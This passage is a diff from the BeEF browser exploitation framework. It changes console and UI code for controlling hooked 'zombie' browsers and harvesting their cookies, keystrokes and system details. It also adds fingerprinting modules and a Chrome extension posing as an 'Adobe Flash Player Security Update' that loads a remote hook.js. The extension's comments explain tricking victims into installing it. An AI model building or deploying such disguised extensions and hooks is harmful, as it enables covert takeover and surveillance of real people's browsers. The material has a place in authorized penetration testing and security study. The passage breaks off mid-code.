'domain' : domain,
'port' : port
};
return new_zombie;
}
/*
* Update the hooked browser trees
* @param: {Literal Object} an object containing the list of offline and online hooked browsers.
@@ -67,33 +81,33 @@ var ZombiesMgr = function(zombies_tree_lists) {
this.updateZombies = function(zombies, rules){
var offline_hooked_browsers = zombies["offline"];
var online_hooked_browsers = zombies["online"];
for(tree_type in this.zombies_tree_lists) {
hooked_browsers_tree = this.zombies_tree_lists[tree_type];
//we compare and remove the hooked browsers from online and offline branches for each tree.
hooked_browsers_tree.compareAndRemove(zombies);
//add an offline browser to the tree
for(var i in offline_hooked_browsers) {
var offline_hooked_browser = this.zombieFactory(i, offline_hooked_browsers);
hooked_browsers_tree.addZombie(offline_hooked_browser, false, ((tree_type != 'basic') ? true : false));
}
//add an online browser to the tree
for(var i in online_hooked_browsers) {
var online_hooked_browser = this.zombieFactory(i, online_hooked_browsers);
hooked_browsers_tree.addZombie(online_hooked_browser, true, ((tree_type != 'basic') ? true : false));
}
//apply the rules to the tree
hooked_browsers_tree.applyRules(rules);
//expand the online hooked browser tree lists
if(hooked_browsers_tree.online_hooked_browsers_treenode.childNodes.length > 0) {
hooked_browsers_tree.online_hooked_browsers_treenode.expand(true);
}
//expand the offline hooked browser tree lists
if(hooked_browsers_tree.offline_hooked_browsers_treenode.childNodes.length > 0) {
hooked_browsers_tree.offline_hooked_browsers_treenode.expand(true);

2
extensions/admin_ui/media/javascript/ui/panel/tabs/ZombieTabRider.js
View File

@@ -32,7 +32,7 @@ ZombieTab_Requester = function(zombie) {
title: 'Proxy',
layout: 'fit',
padding: '10 10 10 10',
html: "<p style='font:11px tahoma,arial,helvetica,sans-serif'>The Tunneling Proxy allows you to use a hooked browser as a proxy. Simply right-click a browser from the Hooked Browsers tree to the left and select \"Use as Proxy\". Each request sent through the Proxy is recorded in the History panel in the Rider tab. Click a history item to view the HTTP headers and HTML source of the HTTP response.</p>",
html: "<div style='font:11px tahoma,arial,helvetica,sans-serif;width:500px' ><p style='font:11px tahoma,arial,helvetica,sans-serif'>The Tunneling Proxy allows you to use a hooked browser as a proxy. Simply right-click a browser from the Hooked Browsers tree to the left and select \"Use as Proxy\".</p><p style='margin: 10 0 10 0'><img src='/ui/media/images/help/proxy.png'></p><p>The proxy runs on localhost port 6789 by default. Each request sent through the Proxy is recorded in the History panel in the Rider tab. Click a history item to view the HTTP headers and HTML source of the HTTP response.</p><p style='margin: 10 0 10 0'><img src='/ui/media/images/help/history.png'></p><p style='font:11px tahoma,arial,helvetica,sans-serif'>To manually forge an arbitrary HTTP request use the \"Forge Request\" tab from the Rider tab.</p><p style='margin: 10 0 10 0'><img src='/ui/media/images/help/forge.png'></p><p style='font:11px tahoma,arial,helvetica,sans-serif'>For more information see: <a href=\"https://github.com/beefproject/beef/wiki/Tunneling\">https://github.com/beefproject/beef/wiki/Tunneling</a></p></div>",
listeners: {
activate: function(proxy_panel) {
// to do: refresh list of hooked browsers

5
extensions/console/lib/command_dispatcher/core.rb
View File

@@ -142,11 +142,12 @@ class Core
'Id',
'IP',
'Browser',
'OS'
'OS',
'Hardware'
])
BeEF::Core::Models::HookedBrowser.all(:lastseen.gte => (Time.new.to_i - 30)).each do |zombie|
tbl << [zombie.id,zombie.ip,BeEF::Core::Models::BrowserDetails.get(zombie.session, 'BrowserName')+"-"+BeEF::Core::Models::BrowserDetails.get(zombie.session, 'BrowserVersion'),BeEF::Core::Models::BrowserDetails.get(zombie.session, 'OsName')]
tbl << [zombie.id,zombie.ip,BeEF::Core::Models::BrowserDetails.get(zombie.session, 'BrowserName')+"-"+BeEF::Core::Models::BrowserDetails.get(zombie.session, 'BrowserVersion'),BeEF::Core::Models::BrowserDetails.get(zombie.session, 'OsName'),BeEF::Core::Models::BrowserDetails.get(zombie.session, 'Hardware')]
end
puts "\n"

528
extensions/console/lib/shellinterface.rb
View File

@@ -8,14 +8,14 @@ module Extension
module Console
class ShellInterface
BD = BeEF::Core::Models::BrowserDetails
def initialize(config)
self.config = config
self.cmd = {}
end
def settarget(id)
begin
self.targetsession = BeEF::Core::Models::HookedBrowser.first(:id => id).session
@@ -25,7 +25,7 @@ class ShellInterface
return nil
end
end
def setofflinetarget(id)
begin
self.targetsession = BeEF::Core::Models::HookedBrowser.first(:id => id).session
@@ -35,7 +35,7 @@ class ShellInterface
return nil
end
end
def cleartarget
self.targetsession = nil
self.targetip = nil
@@ -43,11 +43,11 @@ class ShellInterface
self.cmd = {}
end
# This is a *modified* replica of select_command_modules_tree from extensions/admin_ui/controllers/modules/modules.rb
# @note Get commands. This is a *modified* replica of select_command_modules_tree from extensions/admin_ui/controllers/modules/modules.rb
def getcommands
return if self.targetid.nil?
tree = []
BeEF::Modules.get_categories.each { |c|
if c[-1,1] != "/"
@@ -104,39 +104,39 @@ class ShellInterface
update_command_module_tree(tree, dyn_mod_category, "Verified Unknown", command_mod_name,dyn_mod.id)
}
end
# sort the parent array nodes
# sort the parent array nodes
tree.sort! {|a,b| a['text'] <=> b['text']}
# sort the children nodes by status
tree.each {|x| x['children'] =
x['children'].sort_by {|a| a['status']}
}
# append the number of command modules so the branch name results in: "<category name> (num)"
#tree.each {|command_module_branch|
# num_of_command_modules = command_module_branch['children'].length
# command_module_branch['text'] = command_module_branch['text'] + " (" + num_of_command_modules.to_s() + ")"
#}
# return a JSON array of hashes
tree
end
def setcommand(id)
key = BeEF::Module.get_key_by_database_id(id.to_i)
self.cmd['id'] = id
self.cmd['Name'] = self.config.get("beef.module.#{key}.name")
self.cmd['Description'] = self.config.get("beef.module.#{key}.description")
self.cmd['Category'] = self.config.get("beef.module.#{key}.category")
self.cmd['Data'] = BeEF::Module.get_options(key)
end
def clearcommand
self.cmd = {}
end
def setparam(param,value)
self.cmd['Data'].each do |data|
if data['name'] == param
@@ -145,12 +145,12 @@ class ShellInterface
end
end
end
def getcommandresponses(cmdid = self.cmd['id'])
commands = []
i = 0
BeEF::Core::Models::Command.all(:command_module_id => cmdid, :hooked_browser_id => self.targetid).each do |command|
commands.push({
'id' => i,
@@ -160,10 +160,10 @@ class ShellInterface
})
i+=1
end
commands
end
def getindividualresponse(cmdid)
results = []
begin
@@ -175,26 +175,26 @@ class ShellInterface
end
results
end
def executecommand
definition = {}
options = {}
options.store("zombie_session", self.targetsession.to_s)
options.store("command_module_id", self.cmd['id'])
if not self.cmd['Data'].nil?
self.cmd['Data'].each do |key|
options.store("txt_"+key['name'].to_s,key['value'])
end
end
options.keys.each {|param|
options.keys.each {|param|
definition[param[4..-1]] = options[param]
oc = BeEF::Core::Models::OptionCache.first_or_create(:name => param[4..-1])
oc.value = options[param]
oc.save
}
mod_key = BeEF::Module.get_key_by_database_id(self.cmd['id'])
# Hack to rework the old option system into the new option system
def2 = []
@@ -207,7 +207,7 @@ class ShellInterface
else
return false
end
#Old method
#begin
# BeEF::Core::Models::Command.new( :data => definition.to_json,
@@ -218,10 +218,10 @@ class ShellInterface
#rescue
# return false
#end
#return true
end
def update_command_module_tree(tree, cmd_category, cmd_status, cmd_name, cmd_id)
# construct leaf node for the command module tree
@@ -240,7 +240,7 @@ class ShellInterface
end
}
end
def get_command_module_status(mod)
hook_session_id = self.targetsession
if hook_session_id == nil
@@ -250,7 +250,7 @@ class ShellInterface
'browser' => BD.get(hook_session_id, 'BrowserName'),
'ver' => BD.get(hook_session_id, 'BrowserVersion'),
'os' => [BD.get(hook_session_id, 'OsName')]})
when BeEF::Core::Constants::CommandModule::VERIFIED_NOT_WORKING
return "Verified Not Working"
when BeEF::Core::Constants::CommandModule::VERIFIED_USER_NOTIFY
@@ -263,400 +263,110 @@ class ShellInterface
return "Verified Unknown"
end
end
#Yoinked from the UI panel - we really need to centralise all this stuff and encapsulate it away??
# @note Returns a JSON array containing the summary for a selected zombie.
# Yoinked from the UI panel -
# we really need to centralise all this stuff and encapsulate it away.
def select_zombie_summary
return if self.targetsession.nil?
# init the summary grid
summary_grid_hash = {
'success' => 'true',
'success' => 'true',
'results' => []
}
# set and add the return values for the page title
page_title = BD.get(self.targetsession, 'PageTitle')
if not page_title.nil?
encoded_page_title = CGI.escapeHTML(page_title)
encoded_page_title_hash = { 'Page Title' => encoded_page_title }
page_name_row = {
'category' => 'Hooked Page',
'data' => encoded_page_title_hash,
'from' => 'Initialization'
}
summary_grid_hash['results'].push(page_name_row) # add the row
# zombie properties
# in the form of: category, UI label, value
zombie_properties = [
# Browser
['Browser', 'Browser Name', 'BrowserName'],
['Browser', 'Browser Version', 'BrowserVersion'],
['Browser', 'Browser UA String', 'BrowserReportedName'],
['Browser', 'Browser Platform', 'BrowserPlatform'],
['Browser', 'Browser Plugins', 'BrowserPlugins'],
['Browser', 'Window Size', 'WindowSize'],
# Browser Components
['Browser Components', 'Flash', 'HasFlash'],
['Browser Components', 'Java', 'JavaEnabled'],
['Browser Components', 'VBScript', 'VBScriptEnabled'],
['Browser Components', 'PhoneGap', 'HasPhonegap'],
['Browser Components', 'Google Gears', 'HasGoogleGears'],
['Browser Components', 'Silverlight', 'HasSilverlight'],
['Browser Components', 'Web Sockets', 'HasWebSocket'],
['Browser Components', 'QuickTime', 'HasQuickTime'],
['Browser Components', 'RealPlayer', 'HasRealPlayer'],
['Browser Components', 'Windows Media Player','HasWMP'],
['Browser Components', 'VLC', 'HasVLC'],
['Browser Components', 'Foxit', 'HasFoxit'],
['Browser Components', 'ActiveX', 'HasActiveX'],
['Browser Components', 'Session Cookies', 'hasSessionCookies'],
['Browser Components', 'Persistent Cookies', 'hasPersistentCookies'],
# Hooked Page
['Hooked Page', 'Page Title', 'PageTitle'],
['Hooked Page', 'Page URI', 'PageURI'],
['Hooked Page', 'Page Referrer', 'PageReferrer'],
['Hooked Page', 'Host Name/IP', 'HostName'],
['Hooked Page', 'Cookies', 'Cookies'],
# Host
['Host', 'Date', 'DateStamp'],
['Host', 'Operating System', 'OsName'],
['Host', 'Hardware', 'Hardware'],
['Host', 'CPU', 'CPU'],
['Host', 'Screen Size', 'ScreenSize'],
['Host', 'Touch Screen', 'TouchEnabled']
]
# set and add the return values for each browser property
# in the form of: category, UI label, value
zombie_properties.each do |p|
case p[2]
when "BrowserName"
data = BeEF::Core::Constants::Browsers.friendly_name(BD.get(zombie_session, p[2]))
when "ScreenSize"
screen_size_hash = JSON.parse(BD.get(zombie_session, p[2]).gsub(/\"\=\>/, '":')) # tidy up the string for JSON
width = screen_size_hash['width']
height = screen_size_hash['height']
cdepth = screen_size_hash['colordepth']
data = "Width: #{width}, Height: #{height}, Colour Depth: #{cdepth}"
when "WindowSize"
window_size_hash = JSON.parse(BD.get(zombie_session, p[2]).gsub(/\"\=\>/, '":')) # tidy up the string for JSON
width = window_size_hash['width']
height = window_size_hash['height']
data = "Width: #{width}, Height: #{height}"
else
data = BD.get(zombie_session, p[2])
end
# add property to summary hash
if not data.nil?
summary_grid_hash['results'].push({
'category' => p[0],
'data' => { p[1] => CGI.escapeHTML("#{data}") },
'from' => 'Initialization'
})
end
end
# set and add the return values for the page uri
page_uri = BD.get(self.targetsession, 'PageURI')
if not page_uri.nil?
encoded_page_uri = CGI.escapeHTML(page_uri)
encoded_page_uri_hash = { 'Page URI' => encoded_page_uri }
page_name_row = {
'category' => 'Hooked Page',
'data' => encoded_page_uri_hash,
'from' => 'Initialization'
}
summary_grid_hash['results'].push(page_name_row) # add the row
end
# set and add the return values for the page referrer
page_referrer = BD.get(self.targetsession, 'PageReferrer')
if not page_referrer.nil?
encoded_page_referrer = CGI.escapeHTML(page_referrer)
encoded_page_referrer_hash = { 'Page Referrer' => encoded_page_referrer }
page_name_row = {
'category' => 'Hooked Page',
'data' => encoded_page_referrer_hash,
'from' => 'Initialization'
}
summary_grid_hash['results'].push(page_name_row) # add the row
end
# set and add the return values for the host name
host_name = BD.get(self.targetsession, 'HostName')
if not host_name.nil?
encoded_host_name = CGI.escapeHTML(host_name)
encoded_host_name_hash = { 'Hostname/IP' => encoded_host_name }
page_name_row = {
'category' => 'Hooked Page',
'data' => encoded_host_name_hash,
'from' => 'Initialization'
}
summary_grid_hash['results'].push(page_name_row) # add the row
end
# set and add the return values for the date
date_stamp = BD.get(self.targetsession, 'DateStamp')
if not date_stamp.nil?
encoded_date_stamp = CGI.escapeHTML(date_stamp)
encoded_date_stamp_hash = { 'Date' => encoded_date_stamp }
page_name_row = {
'category' => 'Host',
'data' => encoded_date_stamp_hash,
'from' => 'Initialization'
}
summary_grid_hash['results'].push(page_name_row) # add the row
end
# set and add the return values for the os name
os_name = BD.get(self.targetsession, 'OsName')
if not os_name.nil?
encoded_os_name = CGI.escapeHTML(os_name)
encoded_os_name_hash = { 'OS Name' => encoded_os_name }
page_name_row = {
'category' => 'Host',
'data' => encoded_os_name_hash,
'from' => 'Initialization'
}
summary_grid_hash['results'].push(page_name_row) # add the row
end
# set and add the return values for the os name
hw_name = BD.get(self.targetsession, 'Hardware')
if not hw_name.nil?
encoded_hw_name = CGI.escapeHTML(hw_name)
encoded_hw_name_hash = { 'Hardware' => encoded_hw_name }
page_name_row = {
'category' => 'Host',
'data' => encoded_hw_name_hash,
'from' => 'Initialization'
}
summary_grid_hash['results'].push(page_name_row) # add the row
end
# set and add the return values for the browser name
browser_name = BD.get(self.targetsession, 'BrowserName')
if not browser_name.nil?
friendly_browser_name = BeEF::Core::Constants::Browsers.friendly_name(browser_name)
browser_name_hash = { 'Browser Name' => friendly_browser_name }
browser_name_row = {
'category' => 'Browser',
'data' => browser_name_hash,
'from' => 'Initialization'
}
summary_grid_hash['results'].push(browser_name_row) # add the row
end
# set and add the return values for the browser version
browser_version = BD.get(self.targetsession, 'BrowserVersion')
if not browser_version.nil?
encoded_browser_version = CGI.escapeHTML(browser_version)
browser_version_hash = { 'Browser Version' => encoded_browser_version }
browser_version_row = {
'category' => 'Browser',
'data' => browser_version_hash,
'from' => 'Initialization'
}
summary_grid_hash['results'].push(browser_version_row) # add the row
end
# set and add the return values for the browser ua string
browser_uastring = BD.get(self.targetsession, 'BrowserReportedName')
if not browser_uastring.nil?
browser_uastring_hash = { 'Browser UA String' => browser_uastring }
browser_uastring_row = {
'category' => 'Browser',
'data' => browser_uastring_hash,
'from' => 'Initialization'
}
summary_grid_hash['results'].push(browser_uastring_row) # add the row
end
# set and add the list of cookies
cookies = BD.get(self.targetsession, 'Cookies')
if not cookies.nil? and not cookies.empty?
encoded_cookies = CGI.escapeHTML(cookies)
encoded_cookies_hash = { 'Cookies' => encoded_cookies }
page_name_row = {
'category' => 'Hooked Page',
'data' => encoded_cookies_hash,
'from' => 'Initialization'
}
summary_grid_hash['results'].push(page_name_row) # add the row
end
# set and add the list of plugins installed in the browser
browser_plugins = BD.get(self.targetsession, 'BrowserPlugins')
if not browser_plugins.nil? and not browser_plugins.empty?
encoded_browser_plugins = CGI.escapeHTML(browser_plugins)
encoded_browser_plugins_hash = { 'Browser Plugins' => encoded_browser_plugins }
page_name_row = {
'category' => 'Browser',
'data' => encoded_browser_plugins_hash,
'from' => 'Initialization'
}
summary_grid_hash['results'].push(page_name_row) # add the row
end
# set and add the System Platform
system_platform = BD.get(self.targetsession, 'SystemPlatform')
if not system_platform.nil?
encoded_system_platform = CGI.escapeHTML(system_platform)
encoded_system_platform_hash = { 'System Platform' => encoded_system_platform }
page_name_row = {
'category' => 'Host',
'data' => encoded_system_platform_hash,
'from' => 'Initialization'
}
summary_grid_hash['results'].push(page_name_row) # add the row
end
# set and add the zombie screen size and color depth
screen_size = BD.get(self.targetsession, 'ScreenSize')
if not screen_size.nil?
screen_size_hash = JSON.parse(screen_size.gsub(/\"\=\>/, '":')) # tidy up the string for JSON
width = screen_size_hash['width']
height = screen_size_hash['height']
colordepth = screen_size_hash['colordepth']
# construct the string to be displayed in the details tab
encoded_screen_size = CGI.escapeHTML("Width: "+width.to_s + ", Height: " + height.to_s + ", Colour Depth: " + colordepth.to_s)
encoded_screen_size_hash = { 'Screen Size' => encoded_screen_size }
page_name_row = {
'category' => 'Host',
'data' => encoded_screen_size_hash,
'from' => 'Initialization'
}
summary_grid_hash['results'].push(page_name_row) # add the row
end
# set and add the zombie browser window size
window_size = BD.get(self.targetsession, 'WindowSize')
if not window_size.nil?
window_size_hash = JSON.parse(window_size.gsub(/\"\=\>/, '":')) # tidy up the string for JSON
width = window_size_hash['width']
height = window_size_hash['height']
# construct the string to be displayed in the details tab
encoded_window_size = CGI.escapeHTML("Width: "+width.to_s + ", Height: " + height.to_s)
encoded_window_size_hash = { 'Window Size' => encoded_window_size }
page_name_row = {
'category' => 'Browser',
'data' => encoded_window_size_hash,
'from' => 'Initialization'
}
summary_grid_hash['results'].push(page_name_row) # add the row
end
# set and add the yes|no value for JavaEnabled
java_enabled = BD.get(self.targetsession, 'JavaEnabled')
if not java_enabled.nil?
encoded_java_enabled = CGI.escapeHTML(java_enabled)
encoded_java_enabled_hash = { 'Java Enabled' => encoded_java_enabled }
page_name_row = {
'category' => 'Browser',
'data' => encoded_java_enabled_hash,
'from' => 'Initialization'
}
summary_grid_hash['results'].push(page_name_row) # add the row
end
# set and add the yes|no value for VBScriptEnabled
vbscript_enabled = BD.get(self.targetsession, 'VBScriptEnabled')
if not vbscript_enabled.nil?
encoded_vbscript_enabled = CGI.escapeHTML(vbscript_enabled)
encoded_vbscript_enabled_hash = { 'VBScript Enabled' => encoded_vbscript_enabled }
page_name_row = {
'category' => 'Browser',
'data' => encoded_vbscript_enabled_hash,
'from' => 'Initialization'
}
summary_grid_hash['results'].push(page_name_row) # add the row
end
# set and add the yes|no value for HasFlash
has_flash = BD.get(self.targetsession, 'HasFlash')
if not has_flash.nil?
encoded_has_flash = CGI.escapeHTML(has_flash)
encoded_has_flash_hash = { 'Has Flash' => encoded_has_flash }
page_name_row = {
'category' => 'Browser',
'data' => encoded_has_flash_hash,
'from' => 'Initialization'
}
summary_grid_hash['results'].push(page_name_row) # add the row
end
# set and add the yes|no value for HasPhonegap
has_phonegap = BD.get(self.targetsession, 'HasPhonegap')
if not has_phonegap.nil?
encoded_has_phonegap = CGI.escapeHTML(has_phonegap)
encoded_has_phonegap_hash = { 'Has Phonegap' => encoded_has_phonegap }
page_name_row = {
'category' => 'Browser',
'data' => encoded_has_phonegap_hash,
'from' => 'Initialization'
}
summary_grid_hash['results'].push(page_name_row) # add the row
end
# set and add the yes|no value for HasGoogleGears
has_googlegears = BD.get(self.targetsession, 'HasGoogleGears')
if not has_googlegears.nil?
encoded_has_googlegears = CGI.escapeHTML(has_googlegears)
encoded_has_googlegears_hash = { 'Has GoogleGears' => encoded_has_googlegears }
page_name_row = {
'category' => 'Browser',
'data' => encoded_has_googlegears_hash,
'from' => 'Initialization'
}
summary_grid_hash['results'].push(page_name_row) # add the row
end
# set and add the yes|no value for HasWebSocket
has_web_socket = BD.get(self.targetsession, 'HasWebSocket')
if not has_web_socket.nil?
encoded_has_web_socket = CGI.escapeHTML(has_web_socket)
encoded_has_web_socket_hash = { 'Has GoogleGears' => encoded_has_web_socket }
page_name_row = {
'category' => 'Browser',
'data' => encoded_has_web_socket_hash,
'from' => 'Initialization'
}
summary_grid_hash['results'].push(page_name_row) # add the row
end
# set and add the yes|no value for HasActiveX
has_activex = BD.get(self.targetsession, 'HasActiveX')
if not has_activex.nil?
encoded_has_activex = CGI.escapeHTML(has_activex)
encoded_has_activex_hash = { 'Has ActiveX' => encoded_has_activex }
page_name_row = {
'category' => 'Browser',
'data' => encoded_has_activex_hash,
'from' => 'Initialization'
}
summary_grid_hash['results'].push(page_name_row) # add the row
end
# set and add the return values for hasSessionCookies
has_session_cookies = BD.get(self.targetsession, 'hasSessionCookies')
if not has_session_cookies.nil?
encoded_has_session_cookies = CGI.escapeHTML(has_session_cookies)
encoded_has_session_cookies_hash = { 'Session Cookies' => encoded_has_session_cookies }
page_name_row = {
'category' => 'Browser',
'data' => encoded_has_session_cookies_hash,
'from' => 'Initialization'
}
summary_grid_hash['results'].push(page_name_row) # add the row
end
# set and add the return values for hasPersistentCookies
has_persistent_cookies = BD.get(self.targetsession, 'hasPersistentCookies')
if not has_persistent_cookies.nil?
encoded_has_persistent_cookies = CGI.escapeHTML(has_persistent_cookies)
encoded_has_persistent_cookies_hash = { 'Persistent Cookies' => encoded_has_persistent_cookies }
page_name_row = {
'category' => 'Browser',
'data' => encoded_has_persistent_cookies_hash,
'from' => 'Initialization'
}
summary_grid_hash['results'].push(page_name_row) # add the row
end
summary_grid_hash
end
attr_reader :targetsession
attr_reader :targetid
attr_reader :targetip
attr_reader :cmd
protected
attr_writer :targetsession
attr_writer :targetid
attr_writer :targetip

5
extensions/demos/flash_update_chrome_extension/background.js
View File

@@ -6,5 +6,6 @@
d=document;
e=d.createElement('script');
e.src="http://127.0.0.1:3000/hook.js";
d.body.appendChild(e);
e.src="https://192.168.0.2/hook.js";
d.body.appendChild(e);

54
extensions/demos/flash_update_chrome_extension/manifest.json
View File

@@ -1,26 +1,34 @@
{
// Simple chrome extension
// Just loads beef into the extension context.
//
// You may need to set the IP address of the beef hook in background.js
// Then you can pack the extension (from within the chrome extensions page) and add the crx file to extensions/demos/html/
// Simple chrome extension, by antisnatchor and Mike Haworth
// Just loads BeEF into the extension context.
//
// 1. You need to set the IP address (better the domain) of the BeEF hook in background.js
// 2. The BeEF hook address must be == to the CSP allowed domain here below. BeEF must listen on port 443, with TLS enabled.
// Only localhost origin is allowed to load scripts from non HTTPS resources. For anything else, you must use HTTPS.
// 4. You need to upload the extension, as a zip file, to Google Chrome store.
// In latest versions of Chrome (>= 21) you can't install an extension from a different location anymore,
// so the extension can't be served by BeEF anymore. You need to trick the victim to install
// the extension from Google Chrome store.
//
"name": "Adobe Flash Player",
"version": "11.2.202.235",
"description": "Introduces vulnerabilites into web browsers",
"background": {
"scripts": ["background.js"]
},
"icons": {
"16": "icon16.png",
"48": "icon48.png",
"128": "icon128.png"
},
"permissions": [
"tabs",
"http://*/*",
"https://*/*",
"file://*/*",
"cookies"
]
"name": "Adobe Flash Player Security Update",
"manifest_version": 2,
"version": "11.5.502.149",
"description": "Updates Adobe Flash Player with latest securty updates",
"background": {
"scripts": ["background.js"]
},
"content_security_policy": "script-src 'self' 'unsafe-eval' https://192.168.0.2; object-src 'self'",
"icons": {
"16": "icon16.png",
"48": "icon48.png",
"128": "icon128.png"
},
"permissions": [
"tabs",
"http://*/*",
"https://*/*",
"file://*/*",
"cookies"
]
}

4
extensions/events/handler.rb
View File

@@ -52,7 +52,7 @@ module Events
when 'click'
result = "#{event['time']}s - [Mouse Click] x: #{event['x']} y:#{event['y']} > #{event['target']}"
when 'focus'
result = "#{event['time']}s - [Focus] Browser has regained focus."
result = "#{event['time']}s - [Focus] Browser window has regained focus."
when 'copy'
result = "#{event['time']}s - [User Copied Text] \"#{event['data']}\""
when 'cut'
@@ -60,7 +60,7 @@ module Events
when 'paste'
result = "#{event['time']}s - [User Pasted Text] \"#{event['data']}\""
when 'blur'
result = "#{event['time']}s - [Blur] Browser has lost focus."
result = "#{event['time']}s - [Blur] Browser window has lost focus."
when 'keys'
result = "#{event['time']}s - [User Typed] \"#{event['data']}\" > #{event['target']}"
when 'submit'

2
extensions/metasploit/config.yaml
View File

@@ -33,6 +33,6 @@ beef:
{os: 'bt5r3', path: '/opt/metasploit/msf3/'},
{os: 'bt5', path: '/opt/framework3/msf3/'},
{os: 'backbox', path: '/opt/metasploit3/msf3/'},
{os: 'win', path: 'c:\metasploit\msf3\'},
{os: 'win', path: 'c:\\metasploit-framework\\'},
{os: 'custom', path: ''}
]

51
extensions/metasploit/rpcclient.rb
View File

@@ -36,10 +36,12 @@ module Metasploit
#auto start msfrpcd
if (@config['auto_msfrpcd'] || false)
launch_msf = ''
msf_os = ''
@config['msf_path'].each do |path|
if File.exist?(path['path'] + 'msfrpcd')
launch_msf = path['path'] + 'msfrpcd'
print_info 'Found msfrpcd: ' + launch_msf
msf_os = path['os']
end
end
if (launch_msf.length > 0)
@@ -53,32 +55,35 @@ module Metasploit
end
msf_url += opts[:host] + ':' + opts[:port].to_s() + opts[:uri]
if msf_os.eql? "win"
print_info 'Metasploit auto-launch is currently not supported in BeEF on MS Windows.'
else
child = IO.popen([launch_msf, "-f", argssl, "-P" , @config['pass'], "-U" , @config['user'], "-u" , opts[:uri], "-a" , opts[:host], "-p" , opts[:port].to_s()], 'r+')
child = IO.popen([launch_msf, "-f", argssl, "-P" , @config['pass'], "-U" , @config['user'], "-u" , opts[:uri], "-a" , opts[:host], "-p" , opts[:port].to_s()], 'r+')
print_info 'Attempt to start msfrpcd, this may take a while. PID: ' + child.pid.to_s
print_info 'Attempt to start msfrpcd, this may take a while. PID: ' + child.pid.to_s
#Give daemon time to launch
#poll and giveup after timeout
retries = @config['auto_msfrpcd_timeout']
uri = URI(msf_url)
http = Net::HTTP.new(uri.host, uri.port)
#Give daemon time to launch
#poll and giveup after timeout
retries = @config['auto_msfrpcd_timeout']
uri = URI(msf_url)
http = Net::HTTP.new(uri.host, uri.port)
if opts[:ssl]
http.use_ssl = true
end
if not @config['ssl_verify']
http.verify_mode = OpenSSL::SSL::VERIFY_NONE
end
headers = {
'Content-Type' => "binary/message-pack"
}
path = uri.path.empty? ? "/" : uri.path
begin
sleep 1
code = http.head(path, headers).code.to_i
rescue Exception
retry if (retries -= 1) > 0
if opts[:ssl]
http.use_ssl = true
end
if not @config['ssl_verify']
http.verify_mode = OpenSSL::SSL::VERIFY_NONE
end
headers = {
'Content-Type' => "binary/message-pack"
}
path = uri.path.empty? ? "/" : uri.path
begin
sleep 1
code = http.head(path, headers).code.to_i
rescue Exception
retry if (retries -= 1) > 0
end
end
else
print_error 'Please add a custom path for msfrpcd to the config-file.'

6
liveCD/BeEFLive.sh
View File

@@ -9,8 +9,8 @@
#
# This is the auto startup script for the BeEF Live CD.
# IT SHOULD ONLY BE RUN ON THE LIVE CD
# Download LiveCD here: http://beefproject.com/BeEFLive1.2.iso
# MD5 (BeEFLive1.2.iso) = 1bfba0942a3270ee977ceaeae5a6efd2
# Download LiveCD here: http://downloads.beefproject.com/BeEFLive1.4.iso
# MD5 (BeEFLive1.4.iso) = 5167450078ef5e9b8d146113cd4ba67c
#
# This script contains a few fixes to make BeEF play nicely with the way
# remastersys creates the live cd distributable as well as generating host keys
@@ -117,6 +117,8 @@ show_menu() {
f1="/etc/ssh/ssh_host_rsa_key"
if [ -f $f1 ] ; then
echo "[1] Disable SSH [Currently Enabled]"
echo -ne " beef@"
ifconfig | awk -F "[: ]+" '/inet addr:/ { if ($4 != "127.0.0.1") print $4 }'
else
echo "[1] Enable SSH [Currently Disabled]"
fi

34
liveCD/isolinux.txt Normal file
View File

@@ -0,0 +1,34 @@
default vesamenu.c32
prompt 0
timeout 100
menu title BeEF Live CD
menu background splash.png
menu color title 1;37;44 #c0ffffff #00000000 std
label live
menu label live - BeEF Beef Live
kernel /casper/vmlinuz
append file=/cdrom/preseed/custom.seed boot=casper initrd=/casper/initrd.gz quiet splash --
label xforcevesa
menu label xforcevesa - boot Live in safe graphics mode
kernel /casper/vmlinuz
append file=/cdrom/preseed/custom.seed boot=casper xforcevesa initrd=/casper/initrd.gz quiet splash --
label install
menu label install - start the installer directly
kernel /casper/vmlinuz
append file=/cdrom/preseed/custom.seed boot=casper only-ubiquity initrd=/casper/initrd.gz quiet splash --
label memtest
menu label memtest - Run memtest
kernel /install/memtest
append -
label hd
menu label hd - boot the first hard disk
localboot 0x80
append -

BIN
liveCD/splash.png Normal file
View File

Binary file not shown.
Side by Side

After

Width:  |  Height:  |  Size: 37 KiB

1
modules/browser/browser_fingerprinting/command.js
View File

@@ -35,6 +35,7 @@ beef.execute(function() {
new Array("Firefox","7+","resource:///chrome/browser/content/browser/aboutHome-snippet1.png"),
new Array("Firefox","8+","resource:///chrome/browser/skin/classic/aero/browser/Toolbar-inverted.png"),
new Array("Internet Explorer","5-6","res://shdoclc.dll/pagerror.gif"),
new Array("Internet Explorer","7-9","res://ieframe.dll/ielogo.png"),
new Array("Internet Explorer","7+","res://ieframe.dll/info_48.png")
);

14
modules/browser/detect_activex/command.js Normal file
View File

@@ -0,0 +1,14 @@
//
// Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
// Browser Exploitation Framework (BeEF) - http://beefproject.com
// See the file 'doc/COPYING' for copying permission
//
beef.execute(function() {
var result = (beef.browser.hasActiveX())? "Yes" : "No";
beef.net.send("<%= @command_url %>", <%= @command_id %>, "activex="+result);
});

16
modules/browser/detect_activex/config.yaml Normal file
View File

@@ -0,0 +1,16 @@
#
# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
# Browser Exploitation Framework (BeEF) - http://beefproject.com
# See the file 'doc/COPYING' for copying permission
#
beef:
module:
detect_activex:
enable: true
category: "Browser"
name: "Detect ActiveX"
description: "This module will check if the browser has ActiveX support."
authors: ["bcoles"]
target:
user_notify: ["IE"]
not_working: ["All"]

14
modules/browser/detect_activex/module.rb Normal file
View File

@@ -0,0 +1,14 @@
#
# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
# Browser Exploitation Framework (BeEF) - http://beefproject.com
# See the file 'doc/COPYING' for copying permission
#
class Detect_activex < BeEF::Core::Command
def post_execute
content = {}
content['activex'] = @datastore['activex']
save content
end
end

17
modules/browser/detect_extensions/command.js
View File

@@ -1086,15 +1086,24 @@ beef.execute(function() {
for (var i=0; i<chrome_extensions.length; i++) {
detect_chrome_extension(chrome_extensions[i][0], chrome_extensions[i][1]);
}
} catch(e) {}
} catch(e) {
beef.net.send('<%= @command_url %>', <%= @command_id %>, 'fail=detecting Chrome extensions failed');
}
} else if(beef.browser.isFF()) {
try {
for (var i in firefox_extensions) {
detect_firefox_extension(firefox_extensions[i], i);
}
} catch(e) {}
} else {
};
} catch(e) {
